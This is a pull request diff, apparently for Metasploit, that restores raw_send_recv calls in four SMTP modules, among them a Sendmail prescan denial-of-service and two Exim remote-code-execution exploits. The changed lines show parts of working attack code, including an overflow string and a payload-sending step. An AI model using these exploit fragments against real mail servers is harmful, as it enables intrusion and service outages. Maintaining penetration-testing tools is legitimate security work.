### PR TITLE
restore raw_send_recv for module using SMTP mixin

### DIFF
--- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb
+++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
@@ -38,10 +38,10 @@ class MetasploitModule < Msf::Auxiliary
 
       sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28
 
-      smtp_send_recv("EHLO X\r\n")
-      smtp_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
+      raw_send_recv("EHLO X\r\n")
+      raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
       print_status("Sending DoS packet.")
-      smtp_send_recv("RCPT TO: #{sploit}\r\n")
+      raw_send_recv("RCPT TO: #{sploit}\r\n")
 
       disconnect
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

--- a/modules/auxiliary/scanner/smtp/smtp_relay.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb
@@ -82,19 +82,19 @@ class MetasploitModule < Msf::Auxiliary
     begin
       connect
 
-      res = smtp_send_recv("EHLO X\r\n")
+      res = raw_send_recv("EHLO X\r\n")
       vprint_status("#{res.inspect}")
 
-      res = smtp_send_recv("#{mailfrom}\r\n")
+      res = raw_send_recv("#{mailfrom}\r\n")
       vprint_status("#{res.inspect}")
 
-      res = smtp_send_recv("#{mailto}\r\n")
+      res = raw_send_recv("#{mailto}\r\n")
       vprint_status("#{res.inspect}")
 
-      res = smtp_send_recv("DATA\r\n")
+      res = raw_send_recv("DATA\r\n")
       vprint_status("#{res.inspect}")
 
-      res = smtp_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n")
+      res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n")
       vprint_status("#{res.inspect}")
 
       if res =~ /250/

--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     ehlo = datastore['EHLO']
-    ehlo_resp = smtp_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
     ehlo_resp.each_line do |line|
       print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
     end
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
     from << "@#{ehlo}"
     to   = datastore['MAILTO']
 
-    resp = smtp_send_recv("MAIL FROM: #{from}\r\n")
+    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
     resp ||= 'no response'
     msg = "MAIL: #{resp.strip}"
     if not resp or resp[0,3] != '250'
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{rhost}:#{rport} - #{msg}")
     end
 
-    resp = smtp_send_recv("RCPT TO: #{to}\r\n")
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
     resp ||= 'no response'
     msg = "RCPT: #{resp.strip}"
     if not resp or resp[0,3] != '250'
@@ -183,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("#{rhost}:#{rport} - #{msg}")
     end
 
-    resp = smtp_send_recv("DATA\r\n")
+    resp = raw_send_recv("DATA\r\n")
     resp ||= 'no response'
     msg = "DATA: #{resp.strip}"
     if not resp or resp[0,3] != '354'
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
     message <<  "\r\n"
     message << ".\r\n"
 
-    resp = smtp_send_recv(message)
+    resp = raw_send_recv(message)
     msg = "DELIVER: #{resp.strip}"
     if not resp or resp[0,3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")

--- a/modules/exploits/unix/smtp/exim4_string_format.rb
+++ b/modules/exploits/unix/smtp/exim4_string_format.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "Warning: This version of Exim is not exploitable")
     end
 
-    ehlo_resp = smtp_send_recv("EHLO #{ehlo}\r\n")
+    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
     ehlo_resp.each_line do |line|
       print_status("EHLO: #{line.strip}")
     end
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
     from = datastore['MAILFROM']
     to   = datastore['MAILTO']
 
-    resp = smtp_send_recv("MAIL FROM: #{from}\r\n")
+    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
     resp ||= 'no response'
     msg = "MAIL: #{resp.strip}"
     if not resp or resp[0,3] != '250'
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status(msg)
     end
 
-    resp = smtp_send_recv("RCPT TO: #{to}\r\n")
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
     resp ||= 'no response'
     msg = "RCPT: #{resp.strip}"
     if not resp or resp[0,3] != '250'
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status(msg)
     end
 
-    resp = smtp_send_recv("DATA\r\n")
+    resp = raw_send_recv("DATA\r\n")
     resp ||= 'no response'
     msg = "DATA: #{resp.strip}"
     if not resp or resp[0,3] != '354'
@@ -251,21 +251,21 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put body
 
     print_status("Ending first message.")
-    buf = smtp_send_recv("\r\n.\r\n")
+    buf = raw_send_recv("\r\n.\r\n")
     # Should be: "552 Message size exceeds maximum permitted\r\n"
     print_status("Result: #{buf.inspect}") if buf
 
     second_result = ""
 
     print_status("Sending second message ...")
-    buf = smtp_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
+    buf = raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
     # Should be: "sh-x.x$ " !!
     if buf
       print_status("MAIL result: #{buf.inspect}")
       second_result << buf
     end
 
-    buf = smtp_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
+    buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
     # Should be: "sh: RCPT: command not found\n"
     if buf
       print_status("RCPT result: #{buf.inspect}")
@@ -296,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if resp !~ /Summary of my perl/
       print_status("Should have a shell now, sending payload...")
-      buf = smtp_send_recv("\n" + payload.encoded + "\n\n")
+      buf = raw_send_recv("\n" + payload.encoded + "\n\n")
       if buf
         if buf =~ /554 SMTP synchronization error/
           print_error("This target may be patched: #{buf.strip}")


### PR DESCRIPTION
Fixes #17411

Changes in #16153 adjusted modules that were not utilizing `Exploit::Remote::SMTPDeliver` in error. Restore calls to `raw_send_recv` that is no longer shadowed by in `SMTPDeliver`.

## Verification
- [ ] review modules restored here and test as needed.